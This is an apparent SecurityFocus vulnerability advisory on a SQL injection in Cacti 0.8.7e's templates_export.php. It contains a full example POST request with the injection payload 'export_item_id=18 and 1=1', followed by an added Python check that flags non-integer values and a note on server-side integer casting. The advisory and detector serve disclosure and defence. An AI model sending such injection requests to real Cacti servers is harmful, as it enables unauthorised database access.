Cacti 'export_item_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example request is available:

POST /cacti-0.8.7e/templates_export.php HTTP/1.1
Host: www.example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://www.example.com/cacti-0.8.7e/templates_export.php
Cookie: Cacti=563bb99868dfa24cc70982bf80c5c03e
Content-Type: application/x-www-form-urlencoded
Content-Length: 130

export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_template&save_component_export=1&action=save&x=24&y=12
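
A defensive check for the request above, as an added example that is not part of the original advisory or of Cacti's own code: it parses a raw HTTP request and flags any export_item_id value posted to templates_export.php that is not a plain integer. The digits-only rule and the function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs

# Script and parameter named in the advisory; the digits-only rule is an
# assumption about what a legitimate template id looks like.
TARGET_SCRIPT = "templates_export.php"
PARAM = "export_item_id"
DIGITS_ONLY = re.compile(r"\d{1,10}")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    path = target.split("?", 1)[0]
    return method, path, body.strip()


def suspicious_export_item_id(raw):
    """Return the offending decoded values of export_item_id, or [] if clean."""
    method, path, body = parse_request(raw)
    if method != "POST" or not path.endswith("/" + TARGET_SCRIPT):
        return []
    # parse_qs URL-decodes, so encoded forms (%20, +) are normalised first.
    values = parse_qs(body, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not DIGITS_ONLY.fullmatch(v)]


# Constructed sample requests (headers trimmed): the first body is the one
# shown in the advisory, the second is a normal export of template 18.
ADVISORY_REQUEST = (
    "POST /cacti-0.8.7e/templates_export.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "export_item_id=18 and 1=1&include_deps=on&output_format=3"
    "&export_type=graph_template&save_component_export=1&action=save"
)
BENIGN_REQUEST = ADVISORY_REQUEST.replace("18 and 1=1", "18")

if __name__ == "__main__":
    for name, req in (("advisory", ADVISORY_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, suspicious_export_item_id(req))
```

The same digits-only test applies on the server side: rejecting or integer-casting export_item_id before it reaches a query removes the condition the request relies on.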


 

Copyright 2010, SecurityFocus